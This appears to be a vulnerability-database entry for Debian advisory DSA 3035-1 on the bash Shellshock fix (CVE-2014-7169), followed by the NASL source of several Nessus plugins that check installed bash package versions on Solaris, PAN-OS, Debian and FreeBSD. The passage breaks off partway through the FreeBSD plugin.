Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271, released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update, a prefix and suffix are added to the names of environment variables that contain shell functions, as a hardening measure.

Additionally, two out-of-bounds array accesses in the bash parser are fixed; these were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.
Title: Debian Security Advisory DSA 3035-1 (bash - security update)
ID: OPENVAS:1361412562310703035 (OID 1.3.6.1.4.1.25623.1.0.703035)
Type: openvas (scanner), family "Debian Local Security Checks"
Published: 2014-10-01
Modified: 2019-03-19
CVSS: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vulners score: 9.6
CVEs: CVE-2014-6271, CVE-2014-7169
EPSS (as of 2023-03-15): CVE-2014-7169 0.9739 (percentile 0.99822); CVE-2014-6271 0.9756 (percentile 0.99994)
Reference: http://www.debian.org/security/2014/dsa-3035.html
Plugin: http://plugins.openvas.org/nasl.php?oid=1361412562310703035
Reporter: Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net
Affected: bash on Debian Linux
Solution: For the stable distribution (wheezy), these problems have been fixed in version 4.2+dfsg-0.1+deb7u3. We recommend that you upgrade your bash packages.
Detection: This check tests the installed software version using the apt package manager. The plugin compares the installed bash, bash-builtins, bash-doc and bash-static packages against version 4.2+dfsg-0.1+deb7u3 on release DEB7.
{"nessus": [{"lastseen": "2023-05-28T14:23:26", "description": "SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080.NASL", "href": "https://www.tenable.com/plugins/nessus/78113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78113);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-02\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149080-02\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # 
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:14", "description": "The remote host is running a version of Palo Alto Networks PAN-OS prior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2014-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/78587", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78587);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nprior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. 
It is, therefore, affected\nby a command injection vulnerability in GNU Bash known as Shellshock,\nwhich is due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/24\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PAN-OS version 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (version !~ \"^\\d+\\.\\d+\") audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1($|[^0-9])\")\n fix = \"6.1.1\";\nelse if (version =~ \"^6\\.0($|[^0-9])\")\n fix = \"6.0.6\";\nelse if (version =~ \"^5\\.1($|[^0-9])\")\n fix = \"5.1.10\";\nelse\n fix = \"5.0.15\";\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : ' + fix +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "SunOS 5.9: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77911", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_149079.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77911);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-01\");\n script_summary(english:\"Check for patch 149079-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149079-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78112 (solaris9_149079.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:29:27", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169 ). 
With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Debian DSA-3035-1 : bash - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3035.NASL", "href": "https://www.tenable.com/plugins/nessus/77882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3035. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77882);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"DSA\", value:\"3035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DSA-3035-1 : bash - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 ). 
With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/bash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2014/dsa-3035\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the bash packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.2+dfsg-0.1+deb7u3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-builtins\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-doc\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-static\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while processing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. 
A similar vulnerability was discovered and tagged as CVE-2014-7169.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bash", "p-cpe:/a:freebsd:freebsd:bash-static", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "href": "https://www.tenable.com/plugins/nessus/77836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77836);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chet Ramey reports :\n\nUnder certain circumstances, bash will execute user code while\nprocessing the environment for exported function definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. 
A\nsimilar vulnerability was discovered and tagged as CVE-2014-7169.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q3/690\");\n # https://vuxml.freebsd.org/freebsd/71ad81da-4414-11e4-a33e-3c970e169bc2.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ec4245a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, 